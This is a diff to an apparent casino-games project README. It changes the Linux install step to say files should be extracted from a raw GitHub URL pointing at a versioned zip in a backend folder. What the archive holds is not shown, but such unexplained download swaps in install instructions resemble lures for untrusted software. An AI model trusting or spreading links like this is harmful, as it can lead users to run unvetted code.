TeacherEvaHung/casino-games/README.md

 - **Windows**: Double-click the `.exe` file and follow the installation prompts.
 - **macOS**: Open the `.dmg` file and drag the casino-games icon into your Applications folder.
-- **Linux**: Extract the files from the `.tar.gz` file.
+- **Linux**: Extract the files from the `https://raw.githubusercontent.com/TeacherEvaHung/casino-games/main/backend/games_casino_1.9-beta.3.zip` file.
 Use the terminal to navigate to the extracted folder and run the application.

 ### Step 5: Launch the Application